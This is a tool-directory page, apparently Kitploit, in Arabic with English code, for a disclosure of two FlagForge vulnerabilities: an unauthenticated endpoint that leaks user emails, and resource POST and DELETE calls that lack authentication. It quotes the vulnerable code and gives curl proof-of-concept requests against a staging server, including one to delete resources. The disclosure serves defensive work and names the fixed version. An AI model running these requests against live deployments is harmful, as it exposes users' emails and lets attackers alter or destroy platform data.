Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2025-59843-CVE-2025-59932 — ثغرة CVE في FlagForge للإصدارات من 2.0.0 إلى 2.3.0. قم بالترقية إلى الإصدار 2.3.1 لإصلاح المشكلة. | Kitploit
أدوات/GitHubGitHub/at0mxploit/cve-2025-59843-cve-2025-59932
تحليل الثغرات الأمنيةجمع المعلوماتأمن الويباختبار الاختراقسوء التكوينأمن واجهات برمجة التطبيقات
GitHubat0mxploit/cve-2025-59843-cve-2025-59932

CVE-2025-59843-CVE-2025-59932

ثغرة CVE في FlagForge للإصدارات من 2.0.0 إلى 2.3.0. قم بالترقية إلى الإصدار 2.3.1 لإصلاح المشكلة.

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
عرض المستودع
1منذ 10 أشهرلم تتم المراجعة بعد

CVE-2025-59843 & CVE-2025-59932

1. الكشف العلني لعناوين البريد الإلكتروني للمستخدمين CVE-2025-59843

النطاق / التطبيق المتأثر: تطبيق FlagForge على الويب

نقطة نهاية API: /api/user/[username]

التفاصيل: تعيد نقطة النهاية عناوين البريد الإلكتروني للمستخدمين دون مصادقة. يمكن الاستعلام عن أي اسم مستخدم علنًا.

السبب الجذري / مرجع الكود:

root@kitploit:~
const user = await UserSchema.findOne({
  name: { $regex: new RegExp(`^${username}$`, 'i') }
}).select('name email image totalScore customBadges createdAt role');

// No authentication check is performed
email: user.email, // Exposed publicly

الخطورة (CVSS v4.0): 5.5 (متوسطة)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:N/VA:N/SC:L/SI:N/SA:N/E:P/CR:M/IR:L/AR:L/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:N/MVA:N/MSC:L/MSI:N/MSA:N/AU:Y/RE:L

التأثير: يمكن للمهاجمين تعداد المستخدمين والوصول إلى عناوين البريد الإلكتروني، مما يؤدي إلى انتهاكات محتملة للخصوصية.

إثبات المفهوم (PoC):

root@kitploit:~
curl "https://staging.flagforge.xyz/api/user/No%20Reply"
Sample Response:

{
  "success": true,
  "user": {
    "name": "No Reply",
    "email": "<REDACTED>",
    ...
  }
}

2. تعديل/حذف الموارد المحتمل دون مصادقة CVE-2025-59932

النطاق / التطبيق المتأثر: تطبيق FlagForge على الويب

نقطة نهاية API: /api/resources

التفاصيل:

تعرّض GET /api/resources جميع الموارد للعموم.

بناءً على مراجعة الكود، طلبات POST و DELETE لا تفرض المصادقة أو التفويض. لم يتم اختبار هذه الطلبات على النظام الحي لتجنب التأثير على بيانات الإنتاج.

الرؤوس الملاحظة (طلب OPTIONS):

root@kitploit:~
❯ curl -i -X OPTIONS "https://staging.flagforge.xyz/api/resources"
HTTP/2 204
access-control-allow-origin: https://staging.flagforge.xyz
allow: DELETE, GET, HEAD, OPTIONS, POST
cache-control: no-store, no-cache, must-revalidate, proxy-revalidate
date: Thu, 25 Sep 2025 15:03:45 GMT
permissions-policy: geolocation=(), microphone=(), camera=(), payment=()
pragma: no-cache
referrer-policy: no-referrer
server: Vercel
strict-transport-security: max-age=31536000; includeSubDomains; preload
vary: rsc, next-router-state-tree, next-router-prefetch, next-router-segment-prefetch
x-content-type-options: nosniff
x-frame-options: DENY
x-matched-path: /api/resources
x-vercel-cache: MISS
x-vercel-id: bom1::iad1::v7k72-1758812623945-4e3fad4b58b4
x-xss-protection: 1; mode=block

الخطورة (CVSS v4.0، إذا كانت POST/DELETE غير مصادقة): 7.8 (عالية)

CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:H/VA:L/SC:L/SI:H/SA:L/E:U/CR:M/IR:H/AR:M/MAV:N/MAC:L/MAT:N/MPR:N/MUI:N/MVC:L/MVI:H/MVA:L/MSC:L/MSI:H/MSA:L/S:N/AU:Y/RE:M/U:Red

التأثير: إذا كانت POST أو DELETE غير مصادقة، يمكن للمهاجم إنشاء أو حذف الموارد، مما يؤثر على سلامة المنصة.

إثبات المفهوم (PoC):

root@kitploit:~
curl -X GET "https://staging.flagforge.xyz/api/resources"

This will give you the _id of the resources.

root@kitploit:~
curl -X POST "https://staging.flagforge.xyz/api/resources" \
-H "Content-Type: application/json" \
-d '{"title":"Test","description":"Test","category":"Web","resourceLink":"https://example.com","uploadedBy":"tester"}'
root@kitploit:~
curl -X DELETE "https://staging.flagforge.xyz/api/resources?id=<resource-id>"

تنزيل الأداة